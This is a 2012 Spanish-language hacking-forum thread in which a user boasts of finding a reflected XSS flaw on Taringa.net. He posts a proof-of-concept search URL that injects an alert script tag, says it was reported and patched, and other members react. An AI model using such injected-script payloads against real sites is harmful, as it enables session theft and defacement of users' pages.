Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Pr0ph3t en Agosto 27, 2012, 11:14:46 AM

Título: Taringa.net XSSed by Pr0ph3t
Publicado por: Pr0ph3t en Agosto 27, 2012, 11:14:46 AM
Acabo de encontrar un bonito XSS en Taringa.net, soy muy haxor.  ;D

(http://i49.tinypic.com/35d2q13.png)

POC:
http://www.taringa.net/buscar/?q=%22%3Ealert%28%2FPr0ph3t%2F%29%22%3Ealert%28%2FPr0ph3t%2F%29&interval=%22%3E%3Cscript%3Ealert%28/Pr0ph3t/%29%3C/script%3E%22%3E%3Cscript%3Ealert%28%2Fsdfsf%2F%29%3C%2Fscript%3Elast-week

ESTÁ REPORTADO.
Título: Re:Taringa.net XSSed by Pr0ph3t
Publicado por: BadSekt0r en Agosto 27, 2012, 12:02:13 PM
bro.. no es que dude pero pero una imagen cualquiera la edita..

Tenes que mostrar el POC sino es lo mismo..

Ademas no es la gran vulneravilidad como para esconderla tanto..

Tomalo con onda no...
Título: Re:Taringa.net XSSed by Pr0ph3t
Publicado por: Pr0ph3t en Agosto 27, 2012, 12:13:23 PM
@BadSektor Ahi os lo dejo, pero ya lo parchearon.
Título: Re:Taringa.net XSSed by Pr0ph3t
Publicado por: Snifer en Agosto 27, 2012, 12:26:54 PM
Buena negro asi me gusta que trabajes 8) luego del 12 me tendras jodiendoles la vida ;)
Título: Re:Taringa.net XSSed by Pr0ph3t
Publicado por: Sanko en Agosto 27, 2012, 01:01:49 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
bro.. no es que dude pero pero una imagen cualquiera la edita..

Tenes que mostrar el POC sino es lo mismo..

Ademas no es la gran vulneravilidad como para esconderla tanto..

Tomalo con onda no...
Man no es una vulnerabilidad grave pero siempre te hace gracia encontrar xss en páginas que se suponen que estan muy bien controladas.
XD , bonita man.